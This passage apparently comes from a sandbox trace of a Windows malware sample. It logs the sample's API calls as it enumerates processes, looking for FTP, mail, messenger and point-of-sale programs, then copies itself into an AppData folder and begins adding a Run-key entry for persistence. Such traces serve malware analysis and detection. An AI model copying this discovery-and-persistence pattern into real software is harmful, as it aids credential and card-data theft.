bInheritHandle=0, dwProcessId=0xb68) returned 0x4e8 [0096.204] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.206] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xfa0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0096.206] CloseHandle (hObject=0x4e8) returned 1 [0096.206] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb70) returned 0x4e8 [0096.206] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.207] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xe0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0096.208] CloseHandle (hObject=0x4e8) returned 1 [0096.208] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb78) returned 0x4e8 [0096.208] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.209] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x230000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0096.209] CloseHandle (hObject=0x4e8) returned 1 [0096.209] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb80) returned 0x4e8 [0096.209] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.211] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x860000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0096.211] CloseHandle (hObject=0x4e8) returned 1 [0096.211] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb88) returned 0x4e8 [0096.211] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.212] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xc40000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0096.213] CloseHandle (hObject=0x4e8) returned 1 [0096.213] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb90) returned 0x4e8 [0096.213] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.214] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1230000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0096.215] CloseHandle (hObject=0x4e8) returned 1 [0096.215] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb98) returned 0x4e8 [0096.215] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.216] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1280000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0096.217] CloseHandle (hObject=0x4e8) returned 1 [0096.217] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xba0) returned 0x4e8 [0096.217] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.218] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xcd0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0096.219] CloseHandle (hObject=0x4e8) returned 1 [0096.219] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xba8) returned 0x4e8 [0096.219] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.220] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xb50000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0096.221] CloseHandle (hObject=0x4e8) returned 1 [0096.221] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb0) returned 0x4e8 [0096.221] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.222] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x10f0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0096.222] CloseHandle (hObject=0x4e8) returned 1 [0096.223] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb8) returned 0x4e8 [0096.223] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.224] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xb70000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0096.224] CloseHandle (hObject=0x4e8) returned 1 [0096.224] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbc0) returned 0x4e8 [0096.224] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.225] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xae0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0096.226] CloseHandle (hObject=0x4e8) returned 1 [0096.226] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbc8) returned 0x4e8 [0096.226] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.227] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xb70000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0096.227] CloseHandle (hObject=0x4e8) returned 1 [0096.227] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbd0) returned 0x4e8 [0096.228] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.229] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1090000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0096.229] CloseHandle (hObject=0x4e8) returned 1 [0096.229] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbd8) returned 0x4e8 [0096.229] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.231] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1260000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0096.231] CloseHandle (hObject=0x4e8) returned 1 [0096.231] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbe0) returned 0x4e8 [0096.231] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.232] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xfc0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0096.232] CloseHandle (hObject=0x4e8) returned 1 [0096.233] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbe8) returned 0x4e8 [0096.233] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.234] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xac0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0096.234] CloseHandle (hObject=0x4e8) returned 1 [0096.234] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbf0) returned 0x4e8 [0096.234] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.235] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x2c0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0096.236] CloseHandle (hObject=0x4e8) returned 1 [0096.236] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbf8) returned 0x4e8 [0096.236] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.237] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xb30000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0096.237] CloseHandle (hObject=0x4e8) returned 1 [0096.237] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7f0) returned 0x4e8 [0096.237] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.239] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x960000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0096.239] CloseHandle (hObject=0x4e8) returned 1 [0096.239] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x60c) returned 0x4e8 [0096.239] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.240] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x11b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0096.241] CloseHandle (hObject=0x4e8) returned 1 [0096.241] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x88c) returned 0x4e8 [0096.241] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.242] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x370000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0096.243] CloseHandle (hObject=0x4e8) returned 1 [0096.243] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8dc) returned 0x4e8 [0096.243] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.244] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x11a0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0096.244] CloseHandle (hObject=0x4e8) returned 1 [0096.245] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e4) returned 0x4e8 [0096.245] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.246] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x11f0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0096.246] CloseHandle (hObject=0x4e8) returned 1 [0096.246] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ec) returned 0x4e8 [0096.246] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.247] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x230000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0096.248] CloseHandle (hObject=0x4e8) returned 1 [0096.248] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8f8) returned 0x4e8 [0096.248] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.249] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x250000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0096.249] CloseHandle (hObject=0x4e8) returned 1 [0096.249] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x900) returned 0x4e8 [0096.249] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.251] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xbf0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0096.251] CloseHandle (hObject=0x4e8) returned 1 [0096.251] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x908) returned 0x4e8 [0096.251] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.252] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xe70000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="point.exe") returned 0x9 [0096.252] CloseHandle (hObject=0x4e8) returned 1 [0096.253] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x914) returned 0x4e8 [0096.253] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.254] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xae0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0096.254] CloseHandle (hObject=0x4e8) returned 1 [0096.254] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa94) returned 0x4e8 [0096.254] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.255] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xe60000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0096.256] CloseHandle (hObject=0x4e8) returned 1 [0096.256] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa9c) returned 0x4e8 [0096.256] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.257] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xed0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0096.257] CloseHandle (hObject=0x4e8) returned 1 [0096.258] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaa4) returned 0x4e8 [0096.258] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.261] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xd80000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0096.261] CloseHandle (hObject=0x4e8) returned 1 [0096.261] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaac) returned 0x4e8 [0096.261] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.263] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xbd0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0096.263] CloseHandle (hObject=0x4e8) returned 1 [0096.263] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xacc) returned 0x4e8 [0096.263] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.264] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x8c0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0096.265] CloseHandle (hObject=0x4e8) returned 1 [0096.265] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xad4) returned 0x4e8 [0096.265] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.266] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x9b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0096.266] CloseHandle (hObject=0x4e8) returned 1 [0096.267] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xadc) returned 0x4e8 [0096.267] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.268] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xd10000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0096.268] CloseHandle (hObject=0x4e8) returned 1 [0096.268] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc08) returned 0x4e8 [0096.268] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.270] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xe60000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0096.270] CloseHandle (hObject=0x4e8) returned 1 [0096.270] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc10) returned 0x4e8 [0096.270] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.271] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1330000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0096.272] CloseHandle (hObject=0x4e8) returned 1 [0096.272] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc18) returned 0x4e8 [0096.272] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.273] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x11e0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0096.273] CloseHandle (hObject=0x4e8) returned 1 [0096.273] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc20) returned 0x4e8 [0096.273] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.276] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x110000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0096.276] CloseHandle (hObject=0x4e8) returned 1 [0096.276] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc44) returned 0x0 [0096.276] CloseHandle (hObject=0x0) returned 0 [0096.276] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe0c) returned 0x0 [0096.276] CloseHandle (hObject=0x0) returned 0 [0096.276] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xea0) returned 0x4e8 [0096.276] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.277] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x400000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") returned 0x44 [0096.278] CloseHandle (hObject=0x4e8) returned 1 [0096.285] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x28) returned 0x749e10 [0096.285] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x25c) returned 0x757600 [0096.285] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x25c) returned 0x2a51960 [0096.285] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x25c) returned 0x2a554a0 [0096.285] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x25c) returned 0x2a09908 [0096.285] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x25c) returned 0x2a18a50 [0096.285] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x25c) returned 0x2a18cb8 [0096.285] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x25c) returned 0x2a18f20 [0096.285] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x25c) returned 0x2a19188 [0096.285] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x25c) returned 0x2a193f0 [0096.285] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x25c) returned 0x2a19658 [0096.292] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18ea40 | out: phkResult=0x18ea40*=0x4e8) returned 0x0 [0096.292] RegQueryValueExW (in: hKey=0x4e8, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18ea3c, lpData=0x18d168, lpcbData=0x18ea20*=0x400 | out: lpType=0x18ea3c*=0x0, lpData=0x18d168*=0x0, lpcbData=0x18ea20*=0x400) returned 0x2 [0096.292] RegCloseKey (hKey=0x4e8) returned 0x0 [0096.292] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75be0000 [0096.293] GetProcAddress (hModule=0x75be0000, lpProcName="SHGetFolderPathW") returned 0x75c65708 [0096.294] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" " [0096.294] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" ", pNumArgs=0x18ea04 | out: pNumArgs=0x18ea04) returned 0x7f0ae0*="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" [0096.294] lstrcpyW (in: lpString1=0x18c968, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" [0096.294] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") returned="0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" [0096.294] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18e168 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0096.294] UuidCreate (in: Uuid=0x18e9b4 | out: Uuid=0x18e9b4) returned 0x0 [0096.294] UuidToStringW (in: Uuid=0x18e9b4, StringUuid=0x18ea48 | out: StringUuid=0x18ea48) returned 0x0 [0096.294] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x50) returned 0x2a52760 [0096.294] RpcMgmtStatsVectorFree (in: StatsVector=0x18ea48 | out: StatsVector=0x18ea48) returned 0x0 [0096.294] PathAppendW (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local", pMore="fa1eafca-d2cd-4c04-a099-4159a69291ac" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac") returned 1 [0096.294] CreateDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\fa1eafca-d2cd-4c04-a099-4159a69291ac"), lpSecurityAttributes=0x0) returned 1 [0096.296] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x90) returned 0x29f48e0 [0096.296] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x90) returned 0x8158b0 [0096.296] PathAppendW (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac", pMore="0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") returned 1 [0096.296] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe")) returned 0 [0096.296] CopyFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe"), bFailIfExists=0) returned 1 [0096.338] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18ea44 | out: phkResult=0x18ea44*=0x4ec) returned 0x0 [0096.339] lstrcpyW (in: lpString1=0x18d968, lpString2="\"" | out: lpString1="\"") returned="\"" [0096.339] lstrcatW (in: lpString1="\"", 